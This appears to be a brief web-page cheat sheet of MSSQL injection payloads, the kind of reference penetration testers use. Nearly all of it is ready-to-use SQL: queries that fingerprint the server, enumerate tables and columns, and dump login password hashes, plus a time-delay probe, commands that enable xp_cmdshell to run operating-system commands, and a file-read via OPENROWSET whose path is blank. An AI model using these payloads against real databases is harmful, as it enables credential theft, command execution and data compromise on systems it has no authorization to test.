MSSQL Injection Cheat Sheet
Author: HollyGraceful Published: 05 August 2021 Last Updated: 03 July 2023
# Comments /* Comment /* -- - # Version SELECT @@VERSION; SELECT version(); # User details current_user() suser_name() system_user() # Database details SELECT db_name(); # Database credentials SELECT name, password_hash FROM master.sys.sql_logins SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins # Server details SELECT host_name(); # Table Name SELECT name FROM master..sysobjects WHERE xtype = 'U'; SELECT table_name FROM information_schema.tables; # Columns Names SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename'); SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename'; # String Concatenation CONCAT(foo, bar) # Conditionals SELECT IIF(1=1, 1, 0); # Time-delay WAITFOR DELAY '0:0:9' # Command Execution EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'dir'; # Read Files SELECT * FROM OPENROWSET(BULK N'', SINGLE_CLOB) AS Contents # Substrings SELECT SUBSTRING('Foobar', 1, 1);